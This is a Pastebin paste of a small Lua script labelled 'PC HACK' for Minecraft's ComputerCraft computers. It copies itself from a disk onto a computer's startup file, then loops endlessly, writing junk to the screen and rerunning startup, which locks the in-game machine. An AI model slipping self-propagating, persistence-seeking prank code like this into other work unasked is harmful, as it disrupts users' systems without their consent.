Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- --PC HACK--
- if string.sub(shell.getRunningProgram(), 1, 5) == "disk/" then
- fs.copy("disk/startup.lua","startup.lua")
- shell.run("startup.lua")
- end
- m = peripheral.wrap("right")
- if m ~= nil then
- if peripheral.getType(m) == "monitor" then
- m.setTextScale(0.5)
- term.redirect(m)
- end
- end
- size = {term.getSize()}
- while true do
- term.setCursorPos(math.random(1, size[1]), math.random(1, size[2]))
- term.write("/y*/as*\\e\x71")
- shell.run("startup")
- end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement